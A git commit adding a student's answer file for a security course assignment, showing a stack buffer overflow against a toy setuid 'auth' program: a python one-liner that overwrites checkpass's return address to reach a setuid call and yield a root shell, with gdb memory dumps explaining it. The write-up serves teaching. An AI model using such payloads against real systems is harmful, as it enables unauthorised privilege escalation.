From d7c4536c91ddd307fc9b99984ac49b5b5459b485 Mon Sep 17 00:00:00 2001
From: Camil Staps
Date: Mon, 30 Nov 2015 22:08:58 +0100
Subject: Assignment 2, 3

---
 CamilStaps-s4498062-Assignment-3/ex4 | 47 ++++++++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 CamilStaps-s4498062-Assignment-3/ex4

(limited to 'CamilStaps-s4498062-Assignment-3/ex4')

diff --git a/CamilStaps-s4498062-Assignment-3/ex4 b/CamilStaps-s4498062-Assignment-3/ex4
new file mode 100644
index 0000000..47214a6
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-3/ex4
@@ -0,0 +1,47 @@
+a
+    That would be 0x40085a.
+
+b
+    Done. That gives a root shell:
+
+    $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack("<Q",0x40085a)')"
+    ERROR: password incorrect
+    # 
+    Segmentation fault
+
+c
+    The return address of checkpass has been overwritten with the address of the
+    setuid call. So, after executing checkpass as normally, we 'return' to that
+    setuid call. This explains why we don't read "Starting root shell".
+
+        (gdb) ...
+        0x000000000040082d  14      strcpy(password,input);
+           0x000000000040082a <checkpass+10>:   48 89 e7    mov    rdi,rsp
+        => 0x000000000040082d <checkpass+13>:   e8 0e fe ff ff  call   0x400640 <strcpy@plt>
+        (gdb) x /64bx ($rsp+256)
+        0x7ffe5af18c50: 0x40    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+    --> 0x7ffe5af18c58: 0xf2    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
+        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
+        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+        (gdb) ni
+        15      hash1 = crypt(password,"$6$1122334455667788$");
+        => 0x0000000000400832 <checkpass+18>:   be 24 09 40 00  mov    esi,0x400924
+           0x0000000000400837 <checkpass+23>:   48 89 e7    mov    rdi,rsp
+           0x000000000040083a <checkpass+26>:   e8 41 fe ff ff  call   0x400680 <crypt@plt>
+        (gdb) x /64bx ($rsp+256)
+        0x7ffe5af18c50: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
+    --> 0x7ffe5af18c58: 0x5a    0x08    0x40    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
+        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
+        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
+        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
+        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00
+
+    The relevant line is marked with -->. Before the strcpy, the correct return
+    address is there. After, there is our own address.
+
-- 
cgit v1.2.3